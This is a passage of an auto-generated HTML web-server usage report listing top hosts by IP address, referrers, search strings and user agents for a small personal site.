COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#0080FF" ALIGN=center COLSPAN=2><FONT SIZE="-1">Files</FONT></TH> <TH BGCOLOR="#FF0000" ALIGN=center COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH> <TH BGCOLOR="#FFFF00" ALIGN=center COLSPAN=2><FONT SIZE="-1">Visits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">Hostname</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>521</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">10.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>487</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">15.47%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16338</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">13.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.78%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">71.80.199.42</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>150</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.94%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>126</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6603</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.41%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.36%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.211.169</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>147</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>134</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5657</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.63%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.211.124</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>370</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>324</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">10.29%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5601</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.42%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">108.163.224.130</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>143</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.80%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>133</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5088</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.36%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.209.219</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4000</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.27%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.249.72.177</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>95</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>82</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.60%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3899</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.19%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">68.186.101.141</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1287</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">25.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3837</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.14%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">96.127.149.82</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>101</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>90</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3768</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">206.169.235.14</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>63</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.23%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>56</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3698</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">200.59.197.6</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>80</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.57%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>74</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3491</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">199.196.224.102</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>81</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>78</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.48%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3316</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.189.222.224</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>73</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>65</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3314</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">38.100.226.83</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.16%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.46%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2752</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">63.226.245.113</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>41</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.80%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2685</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.20%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">174.127.153.66</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>39</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.76%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2548</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.09%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">131.107.0.84</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>86</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.68%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>85</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2358</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.93%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">173.10.98.81</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>40</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2340</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.92%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">65.47.30.114</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>163</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.19%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>125</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.97%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2180</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">184.154.164.186</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>155</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>111</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.52%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2151</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.76%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">173.236.59.218</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>62</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>57</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1848</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.211.13</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1594</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.30%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.249.72.202</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1566</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.28%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.249.72.243</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>121</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.37%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>85</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1508</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.23%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">18.03%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">199.21.99.69</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1438</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.18%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.249.72.195</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>56</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>54</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1352</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.171.188.148</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>51</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.62%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1323</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">207.250.79.99</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.14%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1267</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.249.72.194</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1257</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.249.72.196</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>51</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>50</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1240</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">50.34.245.162</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPREFS"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=4>Top 8 of 35 Total Referrers</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">Referrer</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2741</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">53.70%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">- (Direct Request)</FONT></TD></TR> <TR BGCOLOR="#D0D0E0"> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>248</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.86%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><STRONG>Google</STRONG></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.14%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://fiddle.jshell.net/jtbowden/BTqxx/show/">http://fiddle.jshell.net/jtbowden/BTqxx/show/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.14%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://fiddle.jshell.net/mgrcic/Jwg3t/show/">http://fiddle.jshell.net/mgrcic/Jwg3t/show/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://images.yandex.ua/yandsearch">http://images.yandex.ua/yandsearch</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://www.linkedin.com/profile/view">http://www.linkedin.com/profile/view</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://write-less.prijave.com.hr/search/slideup">http://write-less.prijave.com.hr/search/slideup</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://www.linkedin.com/pub/johnny-edick/48/b60/44a">http://www.linkedin.com/pub/johnny-edick/48/b60/44a</A></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPSEARCH"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=4>Top 2 of 2 Total Search Strings</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">Search String</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">80.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">johnny edick</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">20.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">edickj@cwu.edu</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPAGENTS"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=4>Top 24 of 23 Total User Agents</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">User Agent</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1884</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">36.91%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Mozilla/5.0</FONT></TD></TR> <TR BGCOLOR="#D0D0E0"> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1884</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">36.91%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><STRONG>Netscape 6 compatible</STRONG></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1378</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">27.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MSIE 8.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>601</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">11.78%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">SiteLockSpider [en] (WinNT; I ;Nav)</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT 